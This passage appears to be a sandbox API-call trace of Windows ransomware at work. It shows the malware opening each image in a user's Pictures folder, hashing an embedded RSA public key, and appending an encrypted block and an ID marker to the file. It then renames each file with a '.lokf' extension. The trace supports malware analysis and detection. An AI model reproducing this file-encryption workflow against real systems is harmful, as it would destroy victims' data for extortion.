RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.056] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xe1de, lpOverlapped=0x0) returned 1 [0060.057] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.057] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.057] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.057] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.058] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.058] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.058] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.058] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.058] GetLastError () returned 0x0 [0060.058] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.058] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.058] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.058] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.058] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.058] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.059] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe1de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.059] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.059] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.059] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.059] CloseHandle (hObject=0x5cc) returned 1 [0060.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adbb0 [0060.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0060.060] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\N3M3Ys.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\n3m3ys.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\N3M3Ys.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\n3m3ys.jpg.lokf")) returned 1 [0060.061] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42598f70, ftCreationTime.dwHighDateTime=0x1d4c8f7, ftLastAccessTime.dwLowDateTime=0x59e53050, ftLastAccessTime.dwHighDateTime=0x1d4c7d9, ftLastWriteTime.dwLowDateTime=0x59e53050, ftLastWriteTime.dwHighDateTime=0x1d4c7d9, nFileSizeHigh=0x0, nFileSizeLow=0x8f07, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NrGoI7QxowPF0QY4.png", cAlternateFileName="NRGOI7~1.PNG")) returned 1 [0060.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\NrGoI7QxowPF0QY4.png") returned=".png" [0060.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\NrGoI7QxowPF0QY4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\nrgoi7qxowpf0qy4.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.061] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=36615) returned 1 [0060.061] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.064] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8ee1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.064] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.065] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x8f07, lpOverlapped=0x0) returned 1 [0060.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.065] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.065] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.066] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.066] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.066] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.066] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.066] GetLastError () returned 0x0 [0060.066] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.066] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.066] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.066] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.066] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.066] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.066] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.066] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.066] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8f07, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.067] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.067] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.067] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.067] CloseHandle (hObject=0x5cc) returned 1 [0060.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262b28 [0060.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.068] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\NrGoI7QxowPF0QY4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\nrgoi7qxowpf0qy4.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\NrGoI7QxowPF0QY4.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\nrgoi7qxowpf0qy4.png.lokf")) returned 1 [0060.069] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ae2fc70, ftCreationTime.dwHighDateTime=0x1d4cd03, ftLastAccessTime.dwLowDateTime=0x60ead820, ftLastAccessTime.dwHighDateTime=0x1d4c8e0, ftLastWriteTime.dwLowDateTime=0x60ead820, ftLastWriteTime.dwHighDateTime=0x1d4c8e0, nFileSizeHigh=0x0, nFileSizeLow=0x460d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o1B17VGvl2Lz.jpg", cAlternateFileName="O1B17V~1.JPG")) returned 1 [0060.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\o1B17VGvl2Lz.jpg") returned=".jpg" [0060.069] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\o1B17VGvl2Lz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\o1b17vgvl2lz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.069] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=17933) returned 1 [0060.069] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.072] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x45e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.072] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.073] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x460d, lpOverlapped=0x0) returned 1 [0060.073] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.073] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.073] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.073] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.074] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.074] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.074] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.074] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.074] GetLastError () returned 0x0 [0060.074] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.074] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.074] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.074] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.074] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.074] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.074] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x460d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.074] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.075] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.075] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.075] CloseHandle (hObject=0x5cc) returned 1 [0060.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262b28 [0060.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0060.075] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\o1B17VGvl2Lz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\o1b17vgvl2lz.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\o1B17VGvl2Lz.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\o1b17vgvl2lz.jpg.lokf")) returned 1 [0060.077] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe9eaeb0, ftCreationTime.dwHighDateTime=0x1d4d411, ftLastAccessTime.dwLowDateTime=0xd261be60, ftLastAccessTime.dwHighDateTime=0x1d4d2bd, ftLastWriteTime.dwLowDateTime=0xd261be60, ftLastWriteTime.dwHighDateTime=0x1d4d2bd, nFileSizeHigh=0x0, nFileSizeLow=0x1333, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RqbMGhYZcZtImp-D.bmp", cAlternateFileName="RQBMGH~1.BMP")) returned 1 [0060.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.077] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\RqbMGhYZcZtImp-D.bmp") returned=".bmp" [0060.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\RqbMGhYZcZtImp-D.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\rqbmghyzcztimp-d.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.077] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=4915) returned 1 [0060.077] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.079] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x130d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.079] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.080] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.080] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1333, lpOverlapped=0x0) returned 1 [0060.080] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.080] 